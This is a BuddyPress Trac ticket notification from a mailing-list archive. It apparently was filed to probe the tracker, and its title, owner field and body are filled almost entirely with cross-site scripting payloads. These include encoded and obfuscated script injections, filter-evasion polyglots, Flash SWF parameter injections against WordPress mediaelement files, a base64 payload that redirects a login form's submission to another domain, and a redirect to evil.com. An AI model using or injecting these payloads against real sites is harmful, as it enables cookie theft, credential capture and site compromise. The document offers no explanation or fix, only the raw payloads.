[buddypress-trac] [BuddyPress Trac] #7937: --><svg><x><script AND /*/*/*>prompt`xssposed`</x> "><img sRc=l oNerrOr=prompt(document.domain) x> "'--!><Script /K/>confirm(document.domain)</Script /K/> '"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt> a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)> %3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E <svG onLoad=prompt(9)> "><svg/onload=confirm(1)>;
buddypress-trac
noreply at wordpress.org
Wed Jul 25 08:25:32 UTC 2018
#7937: --><svg><x><script AND /*/*/*>prompt`xssposed`</x> "><img sRc=l
oNerrOr=prompt(document.domain) x> "'--!><Script
/K/>confirm(document.domain)</Script /K/>
'"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt>
a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)>
%3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E <svG
onLoad=prompt(9)> "><svg/onload=confirm(1)>;
-------------------------+-------------------------------------------------
Reporter: safwa | Owner: --><svg><x><script AND
| /*/*/*>prompt`xssposed`</x> "><img sRc=l
| oNerrOr=prompt(document.domain) x>
| "'--!><Script
| /K/>confirm(document.domain)</Script /K/>
| '"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt>
| a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)>
| %3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E
| <svG onLoad=prompt(9)>
Type: defect | "><svg/onload=confirm(1)>;
(bug) | Status: assigned
Priority: normal | Milestone: Awaiting Review
Component: Core | Version: 3.0.0
Severity: normal | Resolution:
Keywords: has-patch |
-------------------------+-------------------------------------------------
Changes (by safwa):
* Attachment "xss.xml" added.
'<\i\m\g \s\r\c=x \o\n\e\r\r\o\r=\a\l\e\r\t(\'X\S\S\')\>'; “
OnMouseOver=”prompt`1` "onmouseover=eval(atob('mylastcode in base64'));"
<img src="a"
onerror='eval(atob("ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInlvdXJsb2dpbiIpLmFjdGlvbj0idGhlZG9tYWluLm5ldCI7"))'
<div style="background:<?php echo $colour ?>;">
<scr<script>ipt>alert(document.cookie);</scr<script>ipt> <svg
onload=eval(name)></svg> <img src="X" onerror="confirm(1);"
“\x3Cscript\x3Ealert(document.domain);\x3C\x2Fscript\x3E” †‡•<img src=a
onerror=javascript:alert('hacked')>…‰€
<!%27/*"/*/%27/*/"/*--></Script><Image%20Srcset=K%20*/%3B%20Onerror=confirm%601%60%20//>
"'--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Body/OnPageShow=confirm(`OPENBUGBOUNTY`)>/
jaVasCript:/*-/*'/*\'/*'/*"/**/(/**/oNcliCk=alert())//%OD%OA%Od%Oa//</stYle/</titLe/<teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
';alert(String.fromCharCode(88,83,83,80,79,83,69,68 ))//';
'"--></style></scRipt><scRipt>alert(String.fromCharCode(88,83,83,80,79,83,69,68))</scRipt>
<iframe
src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>
--><svg><x><script AND /*/*/*>prompt`xssposed`</x> "><img src=x
onerror=prompt('XSS')> "><img sRc=l oNerrOr=prompt(document.domain) x>
"'--!><Script /K/>confirm(document.domain)</Script /K/>
'"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt>
a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)>
%3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E
#<!'/*"/*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>#
</Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Body/OnPageShow=(confirm)(document.domain)>#
"><svg/onload=alert(/XSSPOSED/)> <svG onLoad=prompt(9)> "><svg
onload=alert(document.domain)> "><svg/onload=confirm(1)>;
"><svg/onload=confirm(document.domain)>;
<script>alert();</script>”><<script>alert();</script>img src=x
onerror=alert();>
%3c%2f%66%6f%6e%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%3c%2f%73%63%72%69%70%74%3e
wp-
includes/js/mediaelement/flashmediaelement.swf?jsinitfunctio%gn=alert%601%60
wp-includes/js/mediaelement/mediaelement-flash-audio-
ogg.swf?uid=%22%5D%7D))%7Dcatch(e)%7B%7Dalert(document.cookie)//
"/><object/data=data:text/html;base64,PHNjcmlwdD5hbGVydCgvT1BFTkJVR0JPVU5UWS8pIDwvc2NyaXB0Pg==>
=xss%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3CInput/Type=Text%20AutoFocus%20*/;%20OnFocus=confirm(document.domain)%20//%3E%3CSvg%3E#
<img src='test' onm\ouseover='alert(2)'>]";
javascript:alert(document.domain);
:///%01javascript:alert(document.cookie)/ %27-alert(document.domain)-%27
>"'><script>alert(‘XSS')</script> "</script><script>evil()</script>"
;<video><source%20onerror="javascript:alert(1)">
“><script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</script> <table
background="javascript:alert(([code])"></table> <object type=text/html
data="javascript:alert(([code]);"></object> <body
onload="javascript:alert(([code])"></body> <script>
document.location.href = "http://evil.com"؛ </ script>
<SCRIPT>alert(“33")</SCRIPT> <SCRIPT>alert(document.cookie);</SCRIPT>
<SCRIPT>alert(document.domain)</SCRIPT> {meme, src=
http://dummy//onerror=eval(prompt(1))// }
>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>
AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22
%22%2Balert(%27XSS%27)%2B%22 " ="" '></><script></script><svg
onload"="alertonload=alert(1)""
onload=setInterval`alert\x28document.domain\x29`
--
Ticket URL: <https://buddypress.trac.wordpress.org/ticket/7937>
BuddyPress Trac <http://buddypress.org/>
BuddyPress Trac
More information about the buddypress-trac
mailing list